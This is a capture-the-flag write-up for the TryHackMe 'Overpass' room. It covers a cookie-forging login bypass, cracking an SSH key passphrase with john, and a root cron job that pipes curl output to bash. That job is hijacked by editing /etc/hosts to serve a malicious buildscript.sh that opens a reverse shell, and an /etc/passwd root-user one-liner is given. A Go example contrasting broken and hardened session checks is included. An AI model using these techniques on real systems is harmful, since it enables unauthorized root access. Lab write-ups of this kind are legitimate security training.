What happens when some broke CompSci students make a password manager?
Created by: NinjaJc01
nmap -p- -sV -Pn $IP -vv
The initial scan shows TCP port 80 open. We’ll start by enumerating the webpage.
We have what looks like potential usernames. Hey, who made szymex the head of security? That explains why this box is rated easy! 😸️
Looking at the source code (downloads/src/overpass.go) there’s not much we can enumerate. We do find a build script, but more on that later.
Although it won’t get us any closer to solving the challenge… I had to give the program a go. It’s not quite the next gopass but I see some potential.
I used ffuf to do some basic fuzzing and within seconds we get some results. Let’s check out /admin first. That looks interesting. Given this is an OWASP Top 10 based challenge, chances are we’ll run into an IDOR, command injection, broken authentication, or something similar.
🚀 ffuf -c -ic -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.10.246.219/FUZZ -t 100 -fc 401 -v
Not much here but that explains why we have Hello World sitting in our console.
Now we’re talking. Looking at the function login there’s a simple if/else statement. Basically, it checks whether the response is equal to “Incorrect Credentials”. If true, it displays a message saying “Incorrect Credentials”. Otherwise, it sets a cookie named “SessionToken” to the returned statusOrCookie and redirects the user to /admin. Since all that gets checked is that a cookie named SessionToken exists, let’s just create one and give it a bogus value.
Read more about session management and cookies here: OWASP Cheat Sheet
There are many ways to create or edit cookies. I’ll be using Firefox’s dev console; there are more browser extensions than I can count, curl, etc. Feel free to explore and find something that works for you.
To create a cookie, simply hit the plus icon. The important thing is setting the name and the path. Since nothing validates the cookie, you can set its value to whatever you want or leave it empty.
Now that we’ve set our cookie we can reload the page and be redirected to /admin. We’re greeted with an encrypted RSA private key. Based on the message we see it was created for
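The bypass works because nothing on the server ties the SessionToken cookie to a login that actually happened. Here is an added example of what that check should look like, written in Go since that’s what overpass.go is written in. This is my own illustration, not code from the Overpass source: brokenAdmin reproduces the behaviour we just abused (any cookie named SessionToken gets you in), hardenedAdmin only admits tokens the server itself issued, and probe replays a request with a chosen cookie value against each. The store, the handler names and the user alice are all assumptions for the demo.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"sync"
)

// SessionStore is a constructed in-memory session table (token -> username).
// Only tokens the server minted after a successful login are ever present.
type SessionStore struct {
	mu     sync.RWMutex
	tokens map[string]string
}

func NewSessionStore() *SessionStore {
	return &SessionStore{tokens: make(map[string]string)}
}

// Issue mints a 256-bit random token for user and records it server-side.
// It must only be called after the credentials have actually been verified.
func (s *SessionStore) Issue(user string) (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	tok := hex.EncodeToString(b)
	s.mu.Lock()
	s.tokens[tok] = user
	s.mu.Unlock()
	return tok, nil
}

// Lookup resolves a presented token to its user; anything not issued fails.
func (s *SessionStore) Lookup(tok string) (string, bool) {
	s.mu.RLock()
	defer s.mu.RUnlock()
	user, ok := s.tokens[tok]
	return user, ok
}

// SetSessionCookie writes the token with the flags the OWASP cheat sheet asks
// for: not readable from script, HTTPS only, and not sent cross-site.
func SetSessionCookie(w http.ResponseWriter, tok string) {
	http.SetCookie(w, &http.Cookie{
		Name: "SessionToken", Value: tok, Path: "/",
		HttpOnly: true, Secure: true, SameSite: http.SameSiteStrictMode,
	})
}

// brokenAdmin mirrors the weakness in the writeup: the mere presence of a
// SessionToken cookie counts as being logged in, so any value gets through.
func brokenAdmin(w http.ResponseWriter, r *http.Request) {
	if _, err := r.Cookie("SessionToken"); err != nil {
		http.Redirect(w, r, "/", http.StatusFound)
		return
	}
	fmt.Fprint(w, "admin page")
}

// hardenedAdmin admits a request only if its SessionToken is in the store.
func (s *SessionStore) hardenedAdmin(w http.ResponseWriter, r *http.Request) {
	c, err := r.Cookie("SessionToken")
	if err != nil {
		http.Redirect(w, r, "/", http.StatusFound)
		return
	}
	if user, ok := s.Lookup(c.Value); ok {
		fmt.Fprintf(w, "admin page for %s", user)
		return
	}
	http.Redirect(w, r, "/", http.StatusFound)
}

// probe replays GET /admin with the given cookie value against handler and
// returns the status code: 200 means admitted, 302 means bounced to login.
func probe(handler http.HandlerFunc, token string) int {
	req := httptest.NewRequest(http.MethodGet, "/admin", nil)
	req.AddCookie(&http.Cookie{Name: "SessionToken", Value: token, Path: "/"})
	rec := httptest.NewRecorder()
	handler(rec, req)
	return rec.Code
}

func main() {
	store := NewSessionStore()
	tok, err := store.Issue("alice") // "alice" is a made-up user for the demo
	if err != nil {
		panic(err)
	}
	fmt.Println("broken handler, bogus cookie:   ", probe(brokenAdmin, "bogus"))
	fmt.Println("hardened handler, bogus cookie: ", probe(store.hardenedAdmin, "bogus"))
	fmt.Println("hardened handler, issued cookie:", probe(store.hardenedAdmin, tok))
}
```

The point is in the two middle lines of main: the same bogus cookie that gets a 200 from brokenAdmin gets a 302 from hardenedAdmin, and only a token that came out of Issue is accepted.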
Since the RSA key is encrypted we’ll use john to crack the passphrase. I saved the hash as
🚀 /usr/share/john/ssh2john.py id_rsa > id_rsa_hash
🚀 john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
That didn’t take long. Now we can use the private key and the password we cracked to SSH into the box.
There’s user.txt. We also see a todo list. Hmm.. something about a build script.
As usual, let’s get linpeas onto the target. I started a Python HTTP server and downloaded
Make the linpeas script executable with chmod +x linpeas.sh, then run it and pipe the output through tee to save a copy:
./linpeas.sh | tee peas.out
We spot a cron job that uses curl to download a shell script from overpass.thm and pipes it to bash.
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
So we now know there’s a cron job running and what it does. We can trick curl into downloading a script we create called buildscript.sh from our web server. For this to work we’ll need overpass.thm to resolve to our IP address. Good thing linpeas told us we can write to /etc/hosts.
vim /etc/hosts
Add your THM IP, then comment out or delete 127.0.0.1 overpass.thm.
Now that we have overpass.thm resolving to our IP address we can create the directory structure to mimic the URL curl is requesting.
Create the directory structure and use vim to create the fake buildscript.sh script inside it (the file has to live at downloads/src/buildscript.sh, matching the path curl requests):
mkdir -p downloads/src && vim downloads/src/buildscript.sh
buildscript.sh can do whatever you want, as it’s being piped to bash. Here’s an example that recursively chmods the root directory and creates a reverse shell. Obviously this is overkill, but it should give you an idea of what you could do. My personal favorite one-liner to create another root user:
echo "root2:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> /etc/passwd
We have our fake script primed and ready. Spin up a Python HTTP server on port 80 in the /overpass directory (the one containing downloads/src). The directory structure matters!
Start a netcat listener and catch a root shell.
rlwrap nc -lvnp 9001
We can also confirm chmod -R 777 /root worked.
This was a nice easy room from NinjaJc01 that touches on a lot of fundamentals, such as making sure to review any source code when enumerating. I look forward to the next box he develops. Wonderland 2? If you have any questions feel free to @ me in the THM Discord. Thanks for the room, James.